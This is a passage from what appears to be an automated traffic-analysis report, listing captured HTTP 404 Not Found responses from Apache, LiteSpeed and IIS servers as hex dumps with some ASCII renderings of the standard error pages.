74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 17 Nov 2024 07:36:29 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 17 Nov 2024 07:36:31 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundkeep-alive: timeout=5, max=100content-type: text/htmltransfer-encoding: chunkedcontent-encoding: gzipvary: Accept-Encodingdate: Sun, 17 Nov 2024 07:36:45 GMTserver: LiteSpeedx-turbo-charged-by: LiteSpeedconnection: closeData Raw: 31 33 35 32 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cc 5a e9 92 e2 4a 76 fe 7f 9f 02 97 c3 f6 4c a8 ab b5 02 a2 a6 aa 67 b4 21 09 90 90 04 02 84 c3 71 43 bb 84 56 b4 c3 84 1f c8 af e1 27 73 8a aa ea a2 e8 aa db 3d 0e ff 70 f6 8f 42 b9 9c 3c cb 77 ce c9 ce 93 bf fd f6 db e3 3f b1 4b 66 6d 28 dc 20 a8 92 f8 db 6f 8f cf 7f 06 a0 3d 06 ae e9 7c fb ed f2 33 71 2b 13 cc a8 f2 7b f7 58 87 cd d3 1d 93 a5 95 9b 56 f7 d5 29 77 ef 06 f6 f3 d7 d3 5d e5 76 15 dc 93 f8 cb c0 0e cc a2 74 ab a7 ba f2 ee c9 bb 4f e9 98 76 e0 de f7 eb 8b 2c be 22 94 66 f7 76 3f f4 e9 42 a5 30 fd c4 fc 47 56 70 5d 1e 16 6e 79 b5 04 79 47 3d 35 13 f7 e9 ae 09 dd 36 cf 8a ea 6a 5a 1b 3a 55 f0 e4 b8 4d 68 bb f7 97 8f 2f 83 30 0d ab d0 8c ef 4b db 8c dd 27 f4 eb 77 52 55 58 c5 ee 37 02 21 06 72 56 0d a6 59 9d 3a 8f f0 73 e7 b3 2a cb ea 14 bb 83 5e 6f 2f ea b2 cb f2 85 8f 5e d5 56 e6 9c 06 7f bf 4c ed 3f fb e6 01 ed dc 7b 66 12 c6 a7 87 01 55 80 6d bf 0c 04 37 6e dc 2a b4 cd 2f 83 d2 4c cb fb d2 2d 42 ef 2f 3f 2e 2b c3 b3 fb 30 40 89 bc 7b 3f 18 87 a9 7b 1f b8 a1 1f 54 60 f8 2b 81 91 c3 31 4a 60 93 f7 b3 2c d3 8e fc a2 97 01 98 28 ce 8a 87 c1 3f 7b 97 f6 7e da eb 18 36 c5 31 1c 79 3f 96 9b 8e 13 a6 fe c3 e0 a6 3f 31 0b 3f 4c df 75 ff e7 77 f6 4b d7 ae c2 2c fd 02 44 cf 2a b7 b8 d1 87 13 96 79 6c 02 5d 58 71 66 47 ff 07 db 7d ed f1 67 02 8d dc ee f4 cc e4 7d ec 7a 40 4b 66 5d 65 ef 37 7b 19 2e 9e b5 f8 e3 f8 9b ec 03 14 b9 b6 c0 9b a4 5f 01 22 f3 2c 2d dd fb 30 f5 b2 1b 41 5f f5 ca 5c da db de 57 cb cb ca ac ea 12 58 c7 71 6f 16 5f 50 f3 6c fe 21 82 fc cb 1f ad 2e 5c b3 cc d2 cf d7 63 c3 eb f5 3d 24 3f 33 c1 15 67 17 9d da d5 45 ae 2f df 2d 0b e4 ed f7 ba ef 03 c5 cd 86 af d2 22 97 f6 21 bf 3d 96 7a 60 00 c7 fb 40 5d 57 68 2d dc dc 35 81 cd 40 18 79 fe f9 46 ae 67 ff 6a e6 eb ae d8 04 a7 08 ea fd b4 d7 b1 e9 a5 bd 8d 5d 49 79 cb 91 f9 89 50 bf 4e e2 3e ac dc a4 bc 21 f3 1d 49 18 c0 d1 0f ae 14 a6 6f ae 3c c1 3f 01 da b5 3d 6e a8 bf e0 d8 ca aa 2a 4b 1e 06 fd 1e 6f c2 f6 fa ba c2 12 3a ba 1e bc d2 c4 3b fa b7 6a e8 cd 7d ef b8 76 56 98 bd fd 1e 06 20 a4 b8 45 1f 84 de 6f f4 aa 71 10 8f 68 e6 ca 1a 9f ee f3 10 64 8d 5b 5c e1 eb 3d 1b 0f 5e 66 d7 e5 e7 c3 26 88 33 cd ad e7 bc 32 81 51 23 62 32 7a 63 f0 8a 89 cf 51 fc 1a d7 3e 32 d4 2f a8 b1 8e 6f 6c f3 dd d3 c2 f4 12 b3 3f 88 79 71 58 56 f7 97 b4 d2 03 3e 75 07 59 5d 95 21 08 08 fd c7 1b fb bd 21 5f b9 bb 09 c6 df e1 75 d5 ff 26 2d e0 29 0e 6f d8 f2 e2 ac f7 af 3e 32 be df e1 62 69 33 0e 7d 60 64 1b 9c 10 dc e2 6d fc 8d e4 d7 1b bf 79 01 fd 47 3b 5d 12 2e c8 51 9f c5 b0 3e 10 dc 87 89 e9 df 9a f1 bb 50 9f c6 de cb d2 fe 94 03 12 d4 ad 7c 7d ce 6d 5f f2 a3 95 c5 ce 9b 14 bd 1e af a5 fc 51 07 6d 56 38 f7 16 c0 48 04 72 54 ff e7 de 8c e3 f7 04 7e 49 2a 90 d4 01 b8 07 40 57 20 4b d
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundkeep-alive: timeout=5, max=100content-type: text/htmltransfer-encoding: chunkedcontent-encoding: gzipvary: Accept-Encodingdate: Sun, 17 Nov 2024 07:36:48 GMTserver: LiteSpeedx-turbo-charged-by: LiteSpeedconnection: closeData Raw: 31 33 35 32 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cc 5a e9 92 e2 4a 76 fe 7f 9f 02 97 c3 f6 4c a8 ab b5 02 a2 a6 aa 67 b4 21 09 90 90 04 02 84 c3 71 43 bb 84 56 b4 c3 84 1f c8 af e1 27 73 8a aa ea a2 e8 aa db 3d 0e ff 70 f6 8f 42 b9 9c 3c cb 77 ce c9 ce 93 bf fd f6 db e3 3f b1 4b 66 6d 28 dc 20 a8 92 f8 db 6f 8f cf 7f 06 a0 3d 06 ae e9 7c fb ed f2 33 71 2b 13 cc a8 f2 7b f7 58 87 cd d3 1d 93 a5 95 9b 56 f7 d5 29 77 ef 06 f6 f3 d7 d3 5d e5 76 15 dc 93 f8 cb c0 0e cc a2 74 ab a7 ba f2 ee c9 bb 4f e9 98 76 e0 de f7 eb 8b 2c be 22 94 66 f7 76 3f f4 e9 42 a5 30 fd c4 fc 47 56 70 5d 1e 16 6e 79 b5 04 79 47 3d 35 13 f7 e9 ae 09 dd 36 cf 8a ea 6a 5a 1b 3a 55 f0 e4 b8 4d 68 bb f7 97 8f 2f 83 30 0d ab d0 8c ef 4b db 8c dd 27 f4 eb 77 52 55 58 c5 ee 37 02 21 06 72 56 0d a6 59 9d 3a 8f f0 73 e7 b3 2a cb ea 14 bb 83 5e 6f 2f ea b2 cb f2 85 8f 5e d5 56 e6 9c 06 7f bf 4c ed 3f fb e6 01 ed dc 7b 66 12 c6 a7 87 01 55 80 6d bf 0c 04 37 6e dc 2a b4 cd 2f 83 d2 4c cb fb d2 2d 42 ef 2f 3f 2e 2b c3 b3 fb 30 40 89 bc 7b 3f 18 87 a9 7b 1f b8 a1 1f 54 60 f8 2b 81 91 c3 31 4a 60 93 f7 b3 2c d3 8e fc a2 97 01 98 28 ce 8a 87 c1 3f 7b 97 f6 7e da eb 18 36 c5 31 1c 79 3f 96 9b 8e 13 a6 fe c3 e0 a6 3f 31 0b 3f 4c df 75 ff e7 77 f6 4b d7 ae c2 2c fd 02 44 cf 2a b7 b8 d1 87 13 96 79 6c 02 5d 58 71 66 47 ff 07 db 7d ed f1 67 02 8d dc ee f4 cc e4 7d ec 7a 40 4b 66 5d 65 ef 37 7b 19 2e 9e b5 f8 e3 f8 9b ec 03 14 b9 b6 c0 9b a4 5f 01 22 f3 2c 2d dd fb 30 f5 b2 1b 41 5f f5 ca 5c da db de 57 cb cb ca ac ea 12 58 c7 71 6f 16 5f 50 f3 6c fe 21 82 fc cb 1f ad 2e 5c b3 cc d2 cf d7 63 c3 eb f5 3d 24 3f 33 c1 15 67 17 9d da d5 45 ae 2f df 2d 0b e4 ed f7 ba ef 03 c5 cd 86 af d2 22 97 f6 21 bf 3d 96 7a 60 00 c7 fb 40 5d 57 68 2d dc dc 35 81 cd 40 18 79 fe f9 46 ae 67 ff 6a e6 eb ae d8 04 a7 08 ea fd b4 d7 b1 e9 a5 bd 8d 5d 49 79 cb 91 f9 89 50 bf 4e e2 3e ac dc a4 bc 21 f3 1d 49 18 c0 d1 0f ae 14 a6 6f ae 3c c1 3f 01 da b5 3d 6e a8 bf e0 d8 ca aa 2a 4b 1e 06 fd 1e 6f c2 f6 fa ba c2 12 3a ba 1e bc d2 c4 3b fa b7 6a e8 cd 7d ef b8 76 56 98 bd fd 1e 06 20 a4 b8 45 1f 84 de 6f f4 aa 71 10 8f 68 e6 ca 1a 9f ee f3 10 64 8d 5b 5c e1 eb 3d 1b 0f 5e 66 d7 e5 e7 c3 26 88 33 cd ad e7 bc 32 81 51 23 62 32 7a 63 f0 8a 89 cf 51 fc 1a d7 3e 32 d4 2f a8 b1 8e 6f 6c f3 dd d3 c2 f4 12 b3 3f 88 79 71 58 56 f7 97 b4 d2 03 3e 75 07 59 5d 95 21 08 08 fd c7 1b fb bd 21 5f b9 bb 09 c6 df e1 75 d5 ff 26 2d e0 29 0e 6f d8 f2 e2 ac f7 af 3e 32 be df e1 62 69 33 0e 7d 60 64 1b 9c 10 dc e2 6d fc 8d e4 d7 1b bf 79 01 fd 47 3b 5d 12 2e c8 51 9f c5 b0 3e 10 dc 87 89 e9 df 9a f1 bb 50 9f c6 de cb d2 fe 94 03 12 d4 ad 7c 7d ce 6d 5f f2 a3 95 c5 ce 9b 14 bd 1e af a5 fc 51 07 6d 56 38 f7 16 c0 48 04 72 54 ff e7 de 8c e3 f7 04 7e 49 2a 90 d4 01 b8 07 40 57 20 4b d
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundkeep-alive: timeout=5, max=100content-type: text/htmltransfer-encoding: chunkedcontent-encoding: gzipvary: Accept-Encodingdate: Sun, 17 Nov 2024 07:36:50 GMTserver: LiteSpeedx-turbo-charged-by: LiteSpeedconnection: closeData Raw: 31 33 35 32 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cc 5a e9 92 e2 4a 76 fe 7f 9f 02 97 c3 f6 4c a8 ab b5 02 a2 a6 aa 67 b4 21 09 90 90 04 02 84 c3 71 43 bb 84 56 b4 c3 84 1f c8 af e1 27 73 8a aa ea a2 e8 aa db 3d 0e ff 70 f6 8f 42 b9 9c 3c cb 77 ce c9 ce 93 bf fd f6 db e3 3f b1 4b 66 6d 28 dc 20 a8 92 f8 db 6f 8f cf 7f 06 a0 3d 06 ae e9 7c fb ed f2 33 71 2b 13 cc a8 f2 7b f7 58 87 cd d3 1d 93 a5 95 9b 56 f7 d5 29 77 ef 06 f6 f3 d7 d3 5d e5 76 15 dc 93 f8 cb c0 0e cc a2 74 ab a7 ba f2 ee c9 bb 4f e9 98 76 e0 de f7 eb 8b 2c be 22 94 66 f7 76 3f f4 e9 42 a5 30 fd c4 fc 47 56 70 5d 1e 16 6e 79 b5 04 79 47 3d 35 13 f7 e9 ae 09 dd 36 cf 8a ea 6a 5a 1b 3a 55 f0 e4 b8 4d 68 bb f7 97 8f 2f 83 30 0d ab d0 8c ef 4b db 8c dd 27 f4 eb 77 52 55 58 c5 ee 37 02 21 06 72 56 0d a6 59 9d 3a 8f f0 73 e7 b3 2a cb ea 14 bb 83 5e 6f 2f ea b2 cb f2 85 8f 5e d5 56 e6 9c 06 7f bf 4c ed 3f fb e6 01 ed dc 7b 66 12 c6 a7 87 01 55 80 6d bf 0c 04 37 6e dc 2a b4 cd 2f 83 d2 4c cb fb d2 2d 42 ef 2f 3f 2e 2b c3 b3 fb 30 40 89 bc 7b 3f 18 87 a9 7b 1f b8 a1 1f 54 60 f8 2b 81 91 c3 31 4a 60 93 f7 b3 2c d3 8e fc a2 97 01 98 28 ce 8a 87 c1 3f 7b 97 f6 7e da eb 18 36 c5 31 1c 79 3f 96 9b 8e 13 a6 fe c3 e0 a6 3f 31 0b 3f 4c df 75 ff e7 77 f6 4b d7 ae c2 2c fd 02 44 cf 2a b7 b8 d1 87 13 96 79 6c 02 5d 58 71 66 47 ff 07 db 7d ed f1 67 02 8d dc ee f4 cc e4 7d ec 7a 40 4b 66 5d 65 ef 37 7b 19 2e 9e b5 f8 e3 f8 9b ec 03 14 b9 b6 c0 9b a4 5f 01 22 f3 2c 2d dd fb 30 f5 b2 1b 41 5f f5 ca 5c da db de 57 cb cb ca ac ea 12 58 c7 71 6f 16 5f 50 f3 6c fe 21 82 fc cb 1f ad 2e 5c b3 cc d2 cf d7 63 c3 eb f5 3d 24 3f 33 c1 15 67 17 9d da d5 45 ae 2f df 2d 0b e4 ed f7 ba ef 03 c5 cd 86 af d2 22 97 f6 21 bf 3d 96 7a 60 00 c7 fb 40 5d 57 68 2d dc dc 35 81 cd 40 18 79 fe f9 46 ae 67 ff 6a e6 eb ae d8 04 a7 08 ea fd b4 d7 b1 e9 a5 bd 8d 5d 49 79 cb 91 f9 89 50 bf 4e e2 3e ac dc a4 bc 21 f3 1d 49 18 c0 d1 0f ae 14 a6 6f ae 3c c1 3f 01 da b5 3d 6e a8 bf e0 d8 ca aa 2a 4b 1e 06 fd 1e 6f c2 f6 fa ba c2 12 3a ba 1e bc d2 c4 3b fa b7 6a e8 cd 7d ef b8 76 56 98 bd fd 1e 06 20 a4 b8 45 1f 84 de 6f f4 aa 71 10 8f 68 e6 ca 1a 9f ee f3 10 64 8d 5b 5c e1 eb 3d 1b 0f 5e 66 d7 e5 e7 c3 26 88 33 cd ad e7 bc 32 81 51 23 62 32 7a 63 f0 8a 89 cf 51 fc 1a d7 3e 32 d4 2f a8 b1 8e 6f 6c f3 dd d3 c2 f4 12 b3 3f 88 79 71 58 56 f7 97 b4 d2 03 3e 75 07 59 5d 95 21 08 08 fd c7 1b fb bd 21 5f b9 bb 09 c6 df e1 75 d5 ff 26 2d e0 29 0e 6f d8 f2 e2 ac f7 af 3e 32 be df e1 62 69 33 0e 7d 60 64 1b 9c 10 dc e2 6d fc 8d e4 d7 1b bf 79 01 fd 47 3b 5d 12 2e c8 51 9f c5 b0 3e 10 dc 87 89 e9 df 9a f1 bb 50 9f c6 de cb d2 fe 94 03 12 d4 ad 7c 7d ce 6d 5f f2 a3 95 c5 ce 9b 14 bd 1e af a5 fc 51 07 6d 56 38 f7 16 c0 48 04 72 54 ff e7 de 8c e3 f7 04 7e 49 2a 90 d4 01 b8 07 40 57 20 4b d
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundkeep-alive: timeout=5, max=100content-type: text/htmltransfer-encoding: chunkeddate: Sun, 17 Nov 2024 07:36:53 GMTserver: LiteSpeedx-turbo-charged-by: LiteSpeedconnection: closeData Raw: 32 37 38 44 0d 0a 0a 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 32 38 35 37 31 34 32 39 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 46 33 32 33 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 73 65 63 74 69 6f 6e 2c 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 20 31 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 72 65 73 70 6f 6e 73 65 2d 69 6e 66 6f 20 7b 0a 20 20 20
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/10.0X-Powered-By: ASP.NETX-Frame-Options: SAMEORIGINDate: Sun, 17 Nov 2024 07:37:12 GMTConnection: closeContent-Length: 1245Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/10.0X-Powered-By: ASP.NETX-Frame-Options: SAMEORIGINDate: Sun, 17 Nov 2024 07:37:14 GMTConnection: closeContent-Length: 1245Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 